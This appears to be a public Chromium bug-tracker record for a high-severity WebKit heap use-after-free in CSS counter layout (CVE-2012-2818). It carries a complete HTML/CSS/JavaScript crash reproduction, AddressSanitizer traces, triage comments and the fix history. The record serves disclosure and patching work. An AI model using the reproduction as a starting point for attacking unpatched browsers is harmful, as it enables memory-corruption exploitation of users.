Issue metadata

Status: Fixed
Closed: Dec 2012
OS: All
Pri: 1
Type: Bug-Security
Issue 120944: Use-after-free due to issues in counter layout.

Reported by miau...@gmail.com, Mar 29 2012

Issue description

VULNERABILITY DETAILS

use-after-free in WebCore::RenderObject::container

VERSION
Chrome Version: stable, beta, dev

Chromium: 19.0.1085.0 (Developer Build 129583)
OS: Linux
WebKit: 536.5 (@112458)

Operating System: linux 64bit

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        -webkit-animation-name: a;
        -webkit-animation-duration: 1s;
        counter-reset: c;
      }
      #el0::before {
        content: counter(c);
        counter-reset: c;
        width: 1px;
        height: 1px;
        overflow-x: scroll;
        display: block;
      }
      #el0::after {
        counter-reset: c;
        display: table-header-group;
        content: counter(c);
      }
      #el2 {
        counter-reset: c;
      }
      #el3::before {
        content: counter(c);
      }
    </style>
    <script>
      onload = function() {
        el0=document.createElement('div')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElement('div')
        document.body.appendChild(el1)
        el2=document.createElement('div')
        el2.setAttribute('id','el2')
        el1.appendChild(el2)
        el3=document.createElement('div')
        el3.setAttribute('id','el3')
        document.body.appendChild(el3)
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==16346== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffeca75098 at pc 0x55555ac88045 bp 0x7fffffff9100 sp 0x7fffffff90f8
READ of size 8 at 0x7fffeca75098 thread T0
    #0 0x55555ac88045 in WebCore::RenderObject::container(WebCore::RenderBoxModelObject*, bool*) const ???:0
    #1 0x55555ac86e99 in WebCore::RenderObject::markContainingBlocksForLayout(bool, WebCore::RenderObject*) ???:0
    #2 0x55555a557d3a in WebCore::FrameView::scheduleRelayout() ???:0

0x7fffeca75098 is located 24 bytes inside of 184-byte region [0x7fffeca75080,0x7fffeca75138)
freed by thread T0 here:
    #0 0x55555de50f32 in free ??:0
    #1 0x55555aca5bc2 in WebCore::RenderObjectChildList::updateBeforeAfterContent(WebCore::RenderObject*, WebCore::PseudoId, WebCore::RenderObject const*) ???:0
    #2 0x55555aa389ec in WebCore::RenderBlock::styleDidChange(WebCore::StyleDifference, WebCore::RenderStyle const*) ???:0
Attachments: 24184.txt (9.6 KB), 24184.html (1.1 KB), beta-24184.txt (9.4 KB), stable-24184.txt (9.4 KB)

Comment 1 by infe...@chromium.org, Mar 29 2012

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-Stable SecImpacts-Beta OS-All Mstone-18 Stability-AddressSanitizer SecSeverity-High
Status: Available

Comment 2 by kareng@google.com, Mar 30 2012

Labels: -Mstone-18 Mstone-20

Comment 3 by kareng@google.com, Mar 30 2012

Labels: MovedFrom18

Comment 4 by infe...@chromium.org, Mar 30 2012

Labels: -Mstone-20 -MovedFrom18 Mstone-18
Reverting wrong marking of security bugs by release management.

Comment 5 by infe...@chromium.org, Apr 1 2012

Summary: Use-after-free due to issues in counter layout.

Comment 6 by infe...@chromium.org, Apr 1 2012

Cc: lafo...@chromium.org
Weird, dupes are not showing here. Anthony, any idea what is going wrong with the issue tracker wrt security bugs?

1. http://code.google.com/p/chromium/issues/detail?id=121291
2. http://code.google.com/p/chromium/issues/detail?id=121290
3. http://code.google.com/p/chromium/issues/detail?id=115912
4. http://code.google.com/p/chromium/issues/detail?id=120222

Comment 7 by miau...@gmail.com, Apr 1 2012

:(

Comment 8 by infe...@chromium.org, Apr 2 2012

Cc: miau...@gmail.com
Issue 108958 has been merged into this issue.

Comment 9 by scarybea...@gmail.com, Apr 2 2012

@inferno: did we mean to merge the older bug into this newer one?

Comment 10 by infe...@chromium.org, Apr 2 2012

Cc: -lafo...@chromium.org
We just have to keep all these counter bugs in one master bug. Since all others were duped against this one, I did the same for 108958. We can fix the credits later.

Comment 11 by scarybea...@gmail.com, Apr 2 2012

Owner: kenrb@chromium.org
Superstar Ken is looking at this one.

Comment 12 by scarybea...@gmail.com, Apr 2 2012

Status: Started

Comment 13 by infe...@chromium.org, Apr 3 2012

Cc: rniwa@chromium.org

Comment 14 by infe...@chromium.org, Apr 3 2012

Cc: jchaffraix@chromium.org kenrb@chromium.org infe...@chromium.org
Issue 121128 has been merged into this issue.

Comment 15 by kenrb@chromium.org, Apr 3 2012

Cc: schenney@chromium.org

Comment 16 by schenney@chromium.org, Apr 3 2012

See http://code.google.com/p/chromium/issues/detail?id=120921 for a long discussion.

I think we are open to security issues with any text element (and maybe others) in a node that gets marked for layout during layout.

Comment 17 by kenrb@chromium.org, Apr 4 2012

Status: Assigned
I can go back to looking at counters after, but I've separated 108958 back out from this and I'm trying to fix that one first.

If anyone is inclined to steal this in the meantime feel free.

Comment 18 by kenrb@chromium.org, Apr 12 2012

Status: Started

Comment 19 by kenrb@chromium.org, Apr 12 2012

Summary: Heap-use-after-free in WebCore::RenderObject::container
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=35921152

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7fcfe384a298
Crash State:
  - crash stack -
  WebCore::RenderObject::container
  WebCore::RenderObject::markContainingBlocksForLayout
  - free stack -
  WebCore::RenderObjectChildList::updateBeforeAfterContent
  WebCore::RenderBlock::styleDidChange
  

Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95T-wkB8UtINNejsfb36-TkqpWA9aLh6OfZrsYtvO5B53ynHEVDQhTRdjiYfyjkl9VtdKL3xvZFpNW_93uTJJIS8Qb_oiFTxTJ86TD_V47On1w2Po7OphkoePURwGgHMqu8g7egQ3m8eEuHl_GjiVqYhx8veA

Comment 20 by infe...@chromium.org, Apr 13 2012

Summary: Use-after-free due to issues in counter layout.
Renaming the bug title since it conflicts with another bug.

Comment 22 by infe...@chromium.org, Apr 22 2012

Issue 124550 has been merged into this issue.

Comment 23 by infe...@chromium.org, May 6 2012

Issue 126404 has been merged into this issue.

Comment 24 by infe...@chromium.org, May 16 2012

Labels: -Mstone-18 Mstone-19
m19 is out, moving milestone m18 bugs to m19.

Comment 25 by kenrb@chromium.org, May 18 2012

Status: Assigned

Comment 26 by kenrb@chromium.org, May 24 2012

These are the test cases that still repro at this point, aside from the first one that started this bug:
https://cluster-fuzz.appspot.com/testcase?key=30740098 (originally from bug 120222)

https://cluster-fuzz.appspot.com/testcase?key=43502492 (originally from bug 126404)

+ all the test cases from bug 121128, but some of those repros are really hard to look at

Comment 27 by infe...@chromium.org, May 25 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/118452

Comment 28 by scarybea...@gmail.com, May 25 2012

Labels: -Mstone-19 Mstone-20 reward-topanel

Comment 29 by infe...@chromium.org, May 25 2012

Labels: -Merge-Approved
Status: Assigned
Reopening, needs a minor fix.

Comment 30 by infe...@chromium.org, May 25 2012

Labels: Merge-Approved
Status: FixUnreleased
Use this instead - http://trac.webkit.org/changeset/118542

Comment 31 by infe...@chromium.org, May 25 2012

Cc: dglazkov@chromium.org shinyak@chromium.org dominicc@chromium.org
Issue 119087 has been merged into this issue.

Comment 32 by ClusterFuzz, May 28 2012

Project Member
ClusterFuzz has detected this issue as fixed in range 139082:139098.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=35921152

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7ff33660da98
Crash State:
  - crash stack -
  WebCore::RenderObject::container
  WebCore::RenderObject::markContainingBlocksForLayout
  - free stack -
  WebCore::RenderObjectChildList::updateBeforeAfterContent
  WebCore::RenderBlock::styleDidChange
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=139082:139098

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94FVj-ykvMa5QK5Gjo3n-OgSYnuNI3WBwius_ToiGfae7XTj-W93xH8UijqoAoU8zNmofoSb8bwWLCCUxm_Z8B5Kfa3JS-4aXQr1TFldPhHJJzDUAXvW2ZEl4p2BLJ0CJdOTnwRcfsflcnmbqkXnF7SDgBMcA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.

Comment 33 by scarybea...@gmail.com, Jun 6 2012

Labels: -Merge-Approved Merge-Merged
M20: http://trac.webkit.org/changeset/119621

Comment 34 by scarybea...@gmail.com, Jun 22 2012

Labels: -reward-topanel reward-1000 reward-unpaid
$1000

Comment 35 by scarybea...@gmail.com, Jun 25 2012

Labels: CVE-2012-2818

Comment 36 by scarybea...@gmail.com, Jul 9 2012

Labels: -reward-unpaid

Comment 37 by bugdroid1@chromium.org, Oct 13 2012

Project Member
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 38 by jsc...@chromium.org, Dec 20 2012

Status: Fixed

Comment 39 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -SecSeverity-High -Mstone-20 Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High

Comment 40 by bugdroid1@chromium.org, Mar 13 2013

Project Member
Labels: Restrict-View-EditIssue

Comment 41 by bugdroid1@chromium.org, Mar 14 2013

Project Member
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue

Comment 42 by scarybea...@gmail.com, Mar 21 2013

Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue

Comment 43 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 44 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 45 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 46 by bugdroid1@chromium.org, Apr 1 2013

Project Member
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 47 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 48 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 49 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 50 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 51 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 52 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
